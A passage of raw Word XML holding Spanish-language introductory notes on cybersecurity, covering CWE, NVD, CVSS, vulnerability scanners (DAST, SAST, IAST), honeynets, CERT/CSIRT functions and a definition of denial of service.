        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">s una lista de tipos de </w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>debilidades</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de software y hardware. Se identifican con la sigla CWE-número.</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1867A35A" w14:textId="77777777" w:rsidR="002D4430" w:rsidRPr="002D4430" w:rsidRDefault="002D4430" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBA1158" w14:textId="6B8919BE" w:rsidR="002D4430" w:rsidRPr="002D4430" w:rsidRDefault="00E27BB6" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>NVD (National Vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00BA754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Database)</w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del NIST es un repositorio de USA para la gestión de datos de vulnerabilidades basados en estándares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16385681" w14:textId="77777777" w:rsidR="002D4430" w:rsidRPr="002D4430" w:rsidRDefault="002D4430" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29021F20" w14:textId="1710F974" w:rsidR="00E27BB6" w:rsidRPr="00BB115D" w:rsidRDefault="00E27BB6" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CVSS</w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System</w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un conjunto de </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>estándares</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> abiertos para asignar un valor o puntaje de severidad a una vulnerabilidad. Este puntaje va de 0.0 a 10.0, siendo este último el de mayor severidad.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="000340F3">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.first.org/cvss</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000340F3">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000340F3">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000340F3">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000340F3">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C458CED" w14:textId="77777777" w:rsidR="002D4430" w:rsidRPr="00F6015B" w:rsidRDefault="00E27BB6" w:rsidP="00E27BB6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevención de </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E7E1C" w14:textId="1A734F7F" w:rsidR="002D4430" w:rsidRDefault="00E27BB6" w:rsidP="00E27BB6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Listas </w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ugtraq</w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es una lista de notificación sobre vulnerabilidades encontradas en software y hardware.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Por </w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F15">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejemplo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002D4430">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://seclists.org/bugtraq</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A2E1F" w14:textId="16CF36D8" w:rsidR="002D4430" w:rsidRDefault="00E27BB6" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistemas </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">utomáticos de </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nálisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA7205" w14:textId="6ACC4021" w:rsidR="00213245" w:rsidRPr="00AE18AA" w:rsidRDefault="00213245" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DAST </w:t>
      </w:r>
      <w:r w:rsidR="00BA754D" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Security Testing)</w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanner de vulnerabilidades, por ejemplo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vega, OpenVAS, Uniscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4F02C" w14:textId="21BF9BD5" w:rsidR="00213245" w:rsidRDefault="00213245" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAST (Static Application Security Testing)</w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00213245">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditoria </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00213245">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>automática</w:t>
      </w:r>
      <w:r w:rsidRPr="00213245">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00213245">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>código</w:t>
      </w:r>
      <w:r w:rsidRPr="00213245">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, por ejemplo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PMD, SonarQube, bandit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3427309A" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="00213245" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>IAST (Interactive Application Security Testing</w:t>
      </w:r>
      <w:r w:rsidR="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Detectan </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a tiempo real durante la </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejecución</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de una aplicación, por ejemplo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Contrast Assess, ContrastSecurity, Hdiv security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BE835" w14:textId="5E09AC63" w:rsidR="00213245" w:rsidRPr="00F6015B" w:rsidRDefault="00213245" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Redes </w:t>
      </w:r>
      <w:r w:rsidR="00585F71" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rampa</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00F6015B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://honeynet.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51881929" w14:textId="77777777" w:rsidR="007A6A2D" w:rsidRDefault="007A6A2D" w:rsidP="00213245">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3A26EA" w14:textId="77777777" w:rsidR="007A6A2D" w:rsidRDefault="007A6A2D" w:rsidP="00213245">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24ADBBA5" w14:textId="77777777" w:rsidR="007A6A2D" w:rsidRDefault="007A6A2D" w:rsidP="007A6A2D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A39809D" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="00F6015B" w:rsidP="007A6A2D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380471FF" w14:textId="77777777" w:rsidR="00213245" w:rsidRPr="00F6015B" w:rsidRDefault="00213245" w:rsidP="007A6A2D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CERT/CSIRT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8929E" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="00213245" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CERT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00213245">
        <w:t xml:space="preserve"> Computer Emergency R</w:t>
      </w:r>
      <w:r>
        <w:t>esponse Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669AFA3C" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRPr="00BA754D" w:rsidRDefault="00213245" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CSIRT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Centro de respuesta a incidentes de seguridad informática.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC835BB" w14:textId="36E40DA4" w:rsidR="00585F71" w:rsidRPr="00F6015B" w:rsidRDefault="00661B3D" w:rsidP="00F6015B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Equipos responsables de gestionar los incidentes de seguridad informática que le competen según su alcance y comunidad. Estos grupos interactúan entre sí a fin de intercambiar información para actuar de la mejor manera ante incidentes, su impacto, alcance y naturaleza, comprender causas, soluciones, coordinar y dar apoyo, brindar información.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Funciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680EA762" w14:textId="6842BC2B" w:rsidR="00585F71" w:rsidRDefault="00661B3D" w:rsidP="00585F71">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ayudar a atenuar y prevenir</w:t>
      </w:r>
      <w:r w:rsidR="007A6A2D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> incidentes graves de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F91BB" w14:textId="77777777" w:rsidR="00585F71" w:rsidRDefault="007A6A2D" w:rsidP="00585F71">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Proteger informaciones valiosas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99AAF6" w14:textId="7E56F004" w:rsidR="00585F71" w:rsidRDefault="007A6A2D" w:rsidP="00585F71">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Coordinar de forma centralizada la seguridad de la información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AE48D" w14:textId="425115D5" w:rsidR="00585F71" w:rsidRDefault="007A6A2D" w:rsidP="00585F71">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Guardar evidencias, por si hubiera que recurrir </w:t>
      </w:r>
      <w:r w:rsidR="005D2F8D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pleitos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF2CCF" w14:textId="77777777" w:rsidR="00585F71" w:rsidRDefault="007A6A2D" w:rsidP="00585F71">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Apoyar y prestar asistencia a usuarios para recuperarse de incidentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5578B17E" w14:textId="108A677C" w:rsidR="007A6A2D" w:rsidRPr="00585F71" w:rsidRDefault="007A6A2D" w:rsidP="00585F71">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Respuestas centralizadas, promover confianza.</w:t>
      </w:r>
      <w:r w:rsidRPr="00585F71">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E05D8" w14:textId="212B4797" w:rsidR="007A6A2D" w:rsidRPr="00F6015B" w:rsidRDefault="007A6A2D" w:rsidP="007A6A2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Denegación de </w:t>
      </w:r>
      <w:r w:rsidR="00585F71" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ervicio (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072E57D" w14:textId="77777777" w:rsidR="007A6A2D" w:rsidRDefault="007A6A2D" w:rsidP="007A6A2D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ataque de denegación de servicio, es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda o sobrecarga de recursos computacionales.</w:t>
      </w:r>
    </w:p>
